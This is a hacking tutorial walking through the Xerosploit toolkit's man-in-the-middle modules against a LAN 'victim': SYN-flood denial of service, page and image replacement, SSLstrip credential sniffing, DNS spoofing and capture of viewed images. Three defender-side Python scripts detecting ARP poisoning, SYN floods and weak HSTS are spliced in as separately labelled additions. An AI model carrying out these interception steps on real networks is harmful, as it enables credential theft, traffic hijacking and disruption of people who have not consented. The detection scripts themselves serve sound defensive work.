Networking is an important platform for an Ethical Hacker to check on, since many threats come from the internal network: network sniffing, ARP spoofing, MITM, etc. This article is on Xerosploit, which provides advanced MITM attacks on your local network to sniff packets, steal passwords, etc.
Table of Contents
· Introduction to Xerosploit
· Man-In-The-Middle
· Xerosploit Installation
· PSCAN (Port Scanner)
· DOS (Denial of service)
· INJECTHTML (HTML INJECTION)
· rdownload
· SNIFF
· dspoof
· YPLAY
· REPLACE
· Driftnet
Introduction to Xerosploit
Xerosploit is a penetration testing toolkit whose goal is to perform man-in-the-middle attacks for testing purposes. It brings various modules that allow efficient attacks to be carried out, and it also allows denial of service attacks and port scanning. It is powered by bettercap and nmap.
For those who are not familiar with the man-in-the-middle attack, welcome to the world of internal network attacks.
Dependencies
nmap
hping3
build-essential
ruby-dev
libpcap-dev
libgmp3-dev
tabulate
terminaltables
Built with various features:
Port scanning
Network mapping
DoS attack
HTML code injection
JavaScript code injection
Download interception and replacement
Sniffing
DNS spoofing
Background audio reproduction
Image replacement
Driftnet
Webpage defacement and more
Man-In-The-Middle
A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other.
There are many open source tools available online for this attack, like Ettercap, MITMF, Xerosploit, etc.
From Wikipedia.org
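As an added defender-side example (not part of Xerosploit or this article), the script below looks for the two symptoms an ARP-based MITM leaves in a host's own neighbour table: one MAC bound to several IPs, and the gateway resolving to a MAC other than a known-good baseline. The sample `ip neigh show` output and the baseline MAC are constructed.

```python
"""Detect ARP cache poisoning symptoms from `ip neigh show` output.

Added example (not Xerosploit code). A LAN MITM tool makes the gateway IP
resolve to the attacker's MAC; from the host that shows up as one MAC bound
to several IPs, or a gateway MAC that differs from a known-good baseline.
"""
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output; addresses are made up.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 00:0c:29:aa:bb:cc REACHABLE
192.168.1.50 dev eth0 lladdr 00:0c:29:aa:bb:cc STALE
192.168.1.105 dev eth0 lladdr 08:00:27:11:22:33 REACHABLE
192.168.1.20 dev eth0 lladdr 3c:52:82:44:55:66 STALE
192.168.1.7 dev eth0  FAILED
"""
# Gateway MAC recorded earlier, when the network was known to be clean (constructed).
KNOWN_GATEWAY = {"ip": "192.168.1.1", "mac": "d8:0d:17:de:ad:00"}

NEIGH_RE = re.compile(r"^(?P<ip>\S+) dev \S+ lladdr (?P<mac>[0-9a-fA-F:]{17}) \S+$")

def parse_neigh(text):
    """Return {ip: mac} for every entry that carries a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table

def macs_with_multiple_ips(table):
    """One MAC answering for several IPs is the classic poisoning footprint."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_mac_changed(table, known=KNOWN_GATEWAY):
    """True when the gateway IP now resolves to a MAC other than the baseline."""
    current = table.get(known["ip"])
    return current is not None and current != known["mac"].lower()

if __name__ == "__main__":
    neigh = parse_neigh(SAMPLE_NEIGH)
    for mac, ips in macs_with_multiple_ips(neigh).items():
        print(f"ALERT: {mac} claims {len(ips)} IPs: {', '.join(ips)}")
    if gateway_mac_changed(neigh):
        print(f"ALERT: gateway MAC is now {neigh[KNOWN_GATEWAY['ip']]}")
```

A static ARP entry for the gateway, or dynamic ARP inspection on the switch, closes the gap that this check only detects after the fact.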
Xerosploit Installation
Xerosploit is an attack tool for MITM which runs only on Linux. To install it, follow these simple steps:
Open up a terminal and type:
git clone https://github.com/LionSec/xerosploit.git
cd xerosploit
./install.py
It will ask you to choose your operating system; here we have pressed 1 for Kali Linux.
Here it will display your network configuration, including IP address, MAC address, gateway, interface and host name. Now run the following command on the xerosploit console to see the initial commands:
help
In this grid we have a list of commands for our attack. We are going for a man-in-the-middle attack, so I will choose the scan command in my next step to scan the whole network.
scan
This command will scan the complete network and find all devices on it.
As you can observe, it has scanned all the active hosts. There are many hosts in this network; you have to choose your target from the given result. I am going to select 192.168.1.105 for the man-in-the-middle attack.
192.168.1.105
At the next prompt it will ask which module you want to load for the man-in-the-middle attack. At this prompt, type help.
help
PSCAN (Port Scanner)
Let's begin with pscan, which is a port scanner: it will show you all the open ports on the target computer and retrieve the version of the programs running on the detected ports. Type run to execute pscan and it will show you all the open ports of the victim's machine.
pscan
DOS (Denial of service)
Type "dos" to load the module. It will send a succession of TCP SYN request packets to the target's system to make the machine unresponsive to legitimate traffic, which means it is performing a SYN flood attack.
dos
run
Press ctrl + c to stop.
If you are familiar with the hping tool, you will notice that this module uses the hping command under the hood to send countless SYN request packets.
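The following added Python script, which is not part of Xerosploit or this article, shows the defender's side of the SYN flood just described: it parses constructed `ss -tan` output from the target and flags listening ports and source addresses that hold an abnormal number of half-open (SYN-RECV) connections.

```python
"""Spot a SYN flood from the target's own socket table (`ss -tan`).

Added example (not Xerosploit code). A SYN flood leaves the server holding
many half-open connections in SYN-RECV; counting them per listening port
and per source address is a cheap, local detector.
"""
import re
from collections import Counter

# Constructed sample of `ss -tan` output; addresses are made up.
SAMPLE_SS = """\
State     Recv-Q Send-Q Local Address:Port   Peer Address:Port
LISTEN    0      128    0.0.0.0:80           0.0.0.0:*
ESTAB     0      0      192.168.1.105:22     192.168.1.20:51522
SYN-RECV  0      0      192.168.1.105:80     203.0.113.9:40001
SYN-RECV  0      0      192.168.1.105:80     203.0.113.9:40002
SYN-RECV  0      0      192.168.1.105:80     203.0.113.9:40003
SYN-RECV  0      0      192.168.1.105:80     198.51.100.4:1024
SYN-RECV  0      0      192.168.1.105:443    203.0.113.9:40004
"""

ROW_RE = re.compile(r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)$")

def half_open(text):
    """Yield (local_port, peer_ip) for every socket in SYN-RECV."""
    for line in text.splitlines()[1:]:  # skip the column header
        m = ROW_RE.match(line.strip())
        if m and m["state"] == "SYN-RECV":
            yield m["local"].rsplit(":", 1)[1], m["peer"].rsplit(":", 1)[0]

def syn_flood_report(text, port_threshold=3, peer_threshold=3):
    """Return ports and peers whose half-open counts reach the thresholds.

    The thresholds are tiny so the constructed sample trips them; on a real
    server they are tuned against the normal SYN-RECV backlog.
    """
    by_port, by_peer = Counter(), Counter()
    for port, peer in half_open(text):
        by_port[port] += 1
        by_peer[peer] += 1
    return {
        "ports": {p: n for p, n in by_port.items() if n >= port_threshold},
        "peers": {ip: n for ip, n in by_peer.items() if n >= peer_threshold},
    }

if __name__ == "__main__":
    print(syn_flood_report(SAMPLE_SS))
```

On Linux the standard kernel-side mitigation is SYN cookies (`net.ipv4.tcp_syncookies=1`), which lets the server answer SYNs without keeping state for every half-open connection.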
INJECTHTML (HTML INJECTION)
HTML injection is a vulnerability in a website that occurs when user input is not correctly sanitized or the output is not encoded, so that an attacker is able to inject valid HTML code into a vulnerable web page. There are many techniques which can use elements and attributes to submit HTML content.
So here we will replace the victim's HTML page with ours. Select any page of your choice; you will notice that I have written "You have been hacked" in my index.html page, which will replace the victim's HTML page. Whatever page the victim tries to open, he/she will see only the replaced one.
First create a page as I have created and save it on the Desktop under the name INDEX.html.
Now run the injecthtml command to load the injecthtml module. Then type the run command to execute injecthtml and enter the path where you have saved the file.
Bravo! We have successfully replaced the page, as you can see in the picture below.
Hit ctrl^c to stop the attack.
SNIFF
Now load the following module to sniff all the traffic of the victim with the command:
sniff
Then enter the following command to execute that module:
run
Now it will ask you whether you want to use SSLstrip to strip the HTTPS URLs to HTTP so that we can catch the login credentials in clear text. So enter y.
When the victim enters the username and password, it will sniff and capture all the data.
Now it will open a separate terminal in which we can see all the credentials in clear text. As you can see, it has successfully captured the login credentials.
Hit ctrl^c to stop the attack.
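As an added example (not from this article or Xerosploit), the script below grades a site's Strict-Transport-Security header, the mechanism that makes the HTTPS-to-HTTP stripping just described fail in a browser that has already seen the policy. The response headers are constructed.

```python
"""Grade a site's HSTS policy against an sslstrip-style HTTPS downgrade.

Added example (not Xerosploit code). sslstrip only works while the browser
is willing to speak plain HTTP to the site; a Strict-Transport-Security
header it has already seen makes it refuse. Parsed per RFC 6797.
"""
import re

ONE_YEAR = 31536000  # seconds; the commonly recommended minimum max-age

def parse_hsts(value):
    """Split 'max-age=...; includeSubDomains; preload' into a dict."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if part:
            name, _, val = part.partition("=")
            directives[name.strip().lower()] = val.strip().strip('"')
    return directives

def assess_hsts(headers):
    """Return a verdict dict for a mapping of response headers (any case)."""
    value = next((v for k, v in headers.items()
                  if k.lower() == "strict-transport-security"), None)
    if value is None:
        return {"verdict": "missing", "reason": "no HSTS header; a first plain-HTTP visit can be stripped"}
    d = parse_hsts(value)
    if not re.fullmatch(r"\d+", d.get("max-age", "")):
        return {"verdict": "invalid", "reason": "max-age missing or not a number"}
    max_age = int(d["max-age"])
    if max_age == 0:
        return {"verdict": "disabled", "reason": "max-age=0 tells browsers to forget the policy"}
    verdict = "weak" if max_age < ONE_YEAR else "strong"
    return {"verdict": verdict, "max_age": max_age,
            "include_subdomains": "includesubdomains" in d, "preload": "preload" in d}

# Constructed response headers, not captured from any real site.
SAMPLE_SITES = {
    "login.example": {"Content-Type": "text/html"},
    "bank.example": {"Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload"},
    "shop.example": {"strict-transport-security": "max-age=300"},
}

if __name__ == "__main__":
    for host, hdrs in SAMPLE_SITES.items():
        print(host, assess_hsts(hdrs))
```

Even a strong header protects only after the first HTTPS visit; the preload directive, once the domain is in the browser preload lists, removes that first-visit window.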
dspoof
This loads the dspoof module, which supplies false DNS information to all targeted hosts and redirects all their HTTP traffic to the specified IP.
Now type the run command to execute the module. It will then ask for the IP address to which you want to redirect the traffic; here we have given our Kali Linux IP.
Now, as soon as the victim opens any webpage, he/she will get the page stored in our web directory which we want to show him/her, as shown in the picture below.
Hit ctrl^c to stop the attack.
YPLAY
Now let's look at another interesting module, yplay. It will play the audio of a video of your choice in the background of the victim's browser. So first execute the yplay command followed by the run command and give the video ID you have selected.
Open your browser and choose your favourite video on YouTube which you want to play in the background in the victim's browser. If the video has any advertisement, skip it and select the ID from the URL.
Come back to xerosploit.
yplay
To execute the yplay module for the attack, type run.
run
In the next step, insert the YouTube video ID which you copied from the URL above.
febVHEarpeQ
Now, no matter what the victim is doing on the laptop, if he/she tries to open any webpage, he/she will hear in the background the song which we want him/her to listen to.
Hit ctrl^c to stop the attack.
REPLACE
I hope all the attacks were quite interesting. But the next one is going to be amazing. Now we will replace all the images on the victim's website with our images. For this, first execute the replace command followed by the run command. Don't forget to give the path of the .png file which you have created as a surprise box for the victim.
replace
run
/root/Desktop/1.png
As the victim opens any URL, he/she will be amazed to see the replaced images on his/her website, as shown here.
Hit ctrl^c to stop the attack.
Driftnet
We will use the driftnet module to capture all the images the victim is viewing on the web with the following commands; it will save all captured pictures in opt/xerosploit/xedriftnet.
driftnet
run
Once the attack is launched, we can see on our screen all the images that he/she is viewing on his/her computer. We can do much more with this tool; for example, by using the move module you can shake the browser contents.
As you can observe, all the images the victim is viewing on his/her system have been captured on your system successfully.
Hopefully, it is needless to say by now that this tool, Xerosploit, is quite interesting and useful for performing so many attacks. I hope readers are going to like this.
HaPpY hAcKing!!